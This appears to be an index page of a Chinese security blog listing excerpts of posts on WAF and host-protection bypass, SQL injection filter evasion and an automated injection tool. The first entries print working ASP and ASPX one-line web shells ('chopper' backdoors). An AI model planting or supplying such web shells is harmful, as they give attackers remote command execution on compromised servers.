ASP一句话木马收集： <%eval request("chopper")%> <%execute request("chopper")%> <%exe ...

aspx木马收集： <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%> ...

0x01 前言 　　在测试过程中，经常会遇到一些主机防护软件，对这方面做了一些尝试，可成功bypass了GET和POST的注入防御，分享一下姿势。 0x02 环境搭建 Windows Serve ...

0X01 前言 　　D盾_IIS防火墙，目前只支持Win2003服务器，前阵子看见官方博客说D盾新版将近期推出，相信功能会更强大，这边分享一下之前的SQL注入防御的测试情况。D盾_IIS防火墙注入防 ...

ModSecurity 是一款开源Web应用防火墙，支持Apache/Nginx/IIS,可作为服务器基础安全设施，还是不错的选择。 系统环境：window 2008 R2+IIS 7 0X01 ...

0x01 前言 　　在一些网站通常会在公用文件引入全局防护代码进行SQL注入、XSS跨站脚本等漏洞的防御，在一定程度上对网站安全防护还是比较有效的。 　　这里讨论一下关键字过滤不完善及常见正则匹配 ...

0x01 前言 　　一直在思考如何编写一个自动化注入工具，这款工具不用太复杂，但是可以用最简单、最直接的方式来获取数据库信息，根据自定义构造的payload来绕过防护，这样子就可以。 0x02 ...

　　​ 梳理了一下自己写过的WAF Bypass相关的文章，按照编写时间顺序，整理成了一个WAF Bypass实战系列，如果你准备了解WAF攻防这一块的内容，可以来了解一下。 第一篇：《Byp ...

在WAF防护逐渐盛行的前几年，我曾研究过各种WAF绕过的技巧，也曾突破过各种各样的WAF防护。最近，准备重新梳理下自己的知识体系，于是，我将自己写过的关于WAF攻防相关的文章内容合并到一个文档，并形成 ...

0x00 前言 在服务器客户端领域，曾经出现过一款360主机卫士，目前已停止更新和维护，官网都打不开了，但服务器中依然经常可以看到它的身影。从半年前的测试虚拟机里面，翻出了360主机卫士Apache ...